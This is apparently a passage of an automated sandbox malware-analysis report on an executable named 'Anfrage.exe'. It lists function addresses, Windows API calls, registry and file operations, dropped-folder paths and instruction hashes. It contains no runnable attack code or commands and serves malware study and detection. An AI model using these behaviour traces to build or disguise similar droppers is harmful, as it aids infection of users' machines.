                                                                          • Instruction Fuzzy Hash: 0F21C971A00225E7DB307FA48F49A5E7A746B44354F24413BF701B22D1DBBE4A42D66E

                                                                          Control-flow Graph (function at 00405A65; graph image and node/edge list not reproduced)
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00405A79
                                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A93
                                                                          Strings
                                                                          • nsa, xrefs: 00405A70
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A68
                                                                          • "C:\Users\user\Desktop\Anfrage.exe", xrefs: 00405A65
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                          • API String ID: 1716503409-1454429881
                                                                          • Opcode ID: 245b3c25697a366b20d072f4ae6f3df15c900acea65bebff5d6a318f0eee9b10
                                                                          • Instruction ID: 72edad6ec601b3e5bedbe0a956b09e0e85e9d1f351c5a8d1d7ddacf5062ef271
                                                                          • Opcode Fuzzy Hash: 245b3c25697a366b20d072f4ae6f3df15c900acea65bebff5d6a318f0eee9b10
                                                                          • Instruction Fuzzy Hash: DBF082363046187BDB108F55ED44B9B7B9CDFA1760F10803BFA44DA180D6B599548B58

                                                                          Control-flow Graph (function at 00402B0E; graph image and node/edge list not reproduced)
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402B2F
                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Close$DeleteEnumOpen
                                                                          • String ID:
                                                                          • API String ID: 1912718029-0
                                                                          APIs
                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                          • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                            • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                            • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                            • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                          • String ID:
                                                                          • API String ID: 1791698881-3916222277
                                                                          APIs
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(?,?,0042BC70,?,0040593A,0042BC70,0042BC70,75573410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DC
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058E1
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058F5
                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                            • Part of subcall function 004054A2: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054E5
                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic,00000000,00000000,000000F0), ref: 0040163C
                                                                          Strings
                                                                          • C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic, xrefs: 00401631
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                          • String ID: C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic
                                                                          • API String ID: 1892508949-3139010620
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 00404F7F
                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404FD0
                                                                            • Part of subcall function 00403FF4: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00404006
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID:
                                                                          • API String ID: 3748168415-3916222277
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C070,Error launching installer), ref: 0040557D
                                                                          • CloseHandle.KERNEL32(?), ref: 0040558A
                                                                          Strings
                                                                          • Error launching installer, xrefs: 00405567
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID: Error launching installer
                                                                          • API String ID: 3712363035-66219284
                                                                          APIs
                                                                            • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,0000059F,00000000,00000022,00000000,?,?), ref: 00402C00
                                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402527
                                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040253A
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nskF5B7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$CloseOpenValue
                                                                          • String ID:
                                                                          • API String ID: 167947723-0
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(80000002,00405EEF,00000000,00000002,?,00000002,?,?,00405EEF,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405CD3
                                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,00405EEF,?,00405EEF), ref: 00405CF4
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00405D15
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3677997916-0
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000), ref: 100028A7
                                                                          • GetLastError.KERNEL32 ref: 100029AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID:
                                                                          • API String ID: 2976181284-0
                                                                          APIs
                                                                            • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,0000059F,00000000,00000022,00000000,?,?), ref: 00402C00
                                                                          • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B3
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nskF5B7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3677997916-0
                                                                          • Opcode ID: d850bb980ad2883e227a71fb5280a52a3d81dc84fb8262d842fcbb69d7bdd2c1
                                                                          • Instruction ID: e91595cf43b51ebfb07aaa5ef395d3110d573e6c70d377c823b3106e64d9cd55
                                                                          • Opcode Fuzzy Hash: d850bb980ad2883e227a71fb5280a52a3d81dc84fb8262d842fcbb69d7bdd2c1
                                                                          • Instruction Fuzzy Hash: 9611E371A00205EFDB20CF60CA985AEBBB4AF10359F20443FE042B72C0D2B88A85DB19
                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 17f8aef753e543b5ee650811f3a930ee6678dad556f6ee04a93732104315d6e9
                                                                          • Instruction ID: 86e07a789f87ce41f875dd809bfef8a2c44af10f02abad90d5e7e67c6ed0449b
                                                                          • Opcode Fuzzy Hash: 17f8aef753e543b5ee650811f3a930ee6678dad556f6ee04a93732104315d6e9
                                                                          • Instruction Fuzzy Hash: 6C01F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678DC038B4C
                                                                          APIs
                                                                            • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,0000059F,00000000,00000022,00000000,?,?), ref: 00402C00
                                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402396
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040239F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteOpenValue
                                                                          • String ID:
                                                                          • API String ID: 849931509-0
                                                                          • Opcode ID: ff0e75e6dbc0e2437b530ccf3d824c87c8e4f35292bcf7b0d6f82daa0a276924
                                                                          • Instruction ID: e00662a738be89c3cfbff0ecf138b3afd2420e904d99b7d2952bcd9b842c0734
                                                                          • Opcode Fuzzy Hash: ff0e75e6dbc0e2437b530ccf3d824c87c8e4f35292bcf7b0d6f82daa0a276924
                                                                          • Instruction Fuzzy Hash: 39F0AF72A00111ABDB20BFA09B8EABE72B89B40354F24003BF241B71C0D9FD8D029769
                                                                          APIs
                                                                          • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                                          • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentExpandStringslstrcmp
                                                                          • String ID:
                                                                          • API String ID: 1938659011-0
                                                                          • Opcode ID: b5552f2be234a290874f3c0f94242e0d4c4f10651bf1eb4e94e930b3861cabfe
                                                                          • Instruction ID: 71b0070a6829c7cde886a334cb24b035409c21bf23b10b7f61276c16d8a13fe4
                                                                          • Opcode Fuzzy Hash: b5552f2be234a290874f3c0f94242e0d4c4f10651bf1eb4e94e930b3861cabfe
                                                                          • Instruction Fuzzy Hash: C4F08231705201EBCF20DF659E45A9B7FA8EF91354B10403BE145F6190D6788542DA6C
                                                                          APIs
                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E43
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E4E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableShow
                                                                          • String ID:
                                                                          • API String ID: 1136574915-0
                                                                          • Opcode ID: cac30e9f311eb4ad2c25aa1c1ee820d5a828409d143bedf3ac931335164bf815
                                                                          • Instruction ID: 766ce69f8d9f29119b9d93d8ed06da5c6cb9de514c9912c491c81b05177acf23
                                                                          • Opcode Fuzzy Hash: cac30e9f311eb4ad2c25aa1c1ee820d5a828409d143bedf3ac931335164bf815
                                                                          • Instruction Fuzzy Hash: 40E01272B04211AFE714EBB5EA895AE7BB4EF40325B20403BE441F21D1DA7949419B5D
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?,?,?,0040320D,00000009), ref: 0040616E
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406189
                                                                            • Part of subcall function 004060EE: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406105
                                                                            • Part of subcall function 004060EE: wsprintfA.USER32 ref: 0040613E
                                                                            • Part of subcall function 004060EE: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406152
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2547128583-0
                                                                          • Opcode ID: 37fdef8a9e74f9e01c5d9cba486b55d61192e0831b538c4ba44b35669f5e3aa1
                                                                          • Instruction ID: fe74a3adc9e6e91e185966662b1f988274032fa32bcfbda24cecdfcd84f5f1f8
                                                                          • Opcode Fuzzy Hash: 37fdef8a9e74f9e01c5d9cba486b55d61192e0831b538c4ba44b35669f5e3aa1
                                                                          • Instruction Fuzzy Hash: 94E08632604211ABD6115A749E0493B63A89F84740302443EF556F6181DB38DC3296AD
                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00405A3A
                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A5C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          • Opcode ID: eb7c70162aaa2fbb41597db753891574ee1d02ab6b0bad872be1f899585ac646
                                                                          • Instruction ID: c63a2702068139c3e9e84e7d8e4b9ff8807d85cc1eea12f828f76e542108ca00
                                                                          • Opcode Fuzzy Hash: eb7c70162aaa2fbb41597db753891574ee1d02ab6b0bad872be1f899585ac646
                                                                          • Instruction Fuzzy Hash: 4ED09E31254301EFEF098F20DE16F2EBAA2EB84B01F11552CBA82950E0DA7158199B15
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00405525
                                                                          • GetLastError.KERNEL32 ref: 00405533
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                          • Instruction ID: 6753ad635049e665ee29f65e98c6a641fb529068fc3dcc6b05b24214ffa30412
                                                                          • Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                          • Instruction Fuzzy Hash: 2FC04C70255901EBDB515F20AF087177965AB60781F564839618AE10E4DA748415D92D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: wsprintf
                                                                          • String ID:
                                                                          • API String ID: 2111968516-0
                                                                          • Opcode ID: 49b3759869228e343b488f69512dd5783725357fe23cd51fc775af813734beff
                                                                          • Instruction ID: 05ba47fdecc3ea63c4ababd7ecb476dc6fb20db578e5a9eb58a554c529b3a997
                                                                          • Opcode Fuzzy Hash: 49b3759869228e343b488f69512dd5783725357fe23cd51fc775af813734beff
                                                                          • Instruction Fuzzy Hash: 6021C970D0429AFADF218B9885486AEBF749F11314F1445BFE894B63D1C1BE8A81CF19
                                                                          APIs
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FileMove
                                                                          • String ID:
                                                                          • API String ID: 3562171763-0
                                                                          • Opcode ID: 959bd50837eb92415fecec8519fb41a0f39fb6080f95b2b2d2609fca4733927e
                                                                          • Instruction ID: af85bf01cb9a50de78f0d69bccb7876c1bca0e6a55c196669191a5ce7f6391a1
                                                                          • Opcode Fuzzy Hash: 959bd50837eb92415fecec8519fb41a0f39fb6080f95b2b2d2609fca4733927e
                                                                          • Instruction Fuzzy Hash: E6F09031B08225A3DB20B7B64F0DD5F11649B82368B34027BF111B21D1DABD860296AE
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026B3
                                                                            • Part of subcall function 00405D21: wsprintfA.USER32 ref: 00405D2E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointerwsprintf
                                                                          • String ID:
                                                                          • API String ID: 327478801-0
                                                                          • Opcode ID: 4841840ad3e59c26d6a825385cdbce8c8f4545ec6429af0b04c71902af0b9ea9
                                                                          • Instruction ID: 70d0227debc7a37a578d7891b0457e087c522133a583d4ed7425beec3b860107
                                                                          • Opcode Fuzzy Hash: 4841840ad3e59c26d6a825385cdbce8c8f4545ec6429af0b04c71902af0b9ea9
                                                                          • Instruction Fuzzy Hash: 40E012B1B04119ABD701EB95AE898BF7BA9DF50329F10843BF141F10D1C67E49429B2D
APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B
Memory Dump Source
• Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
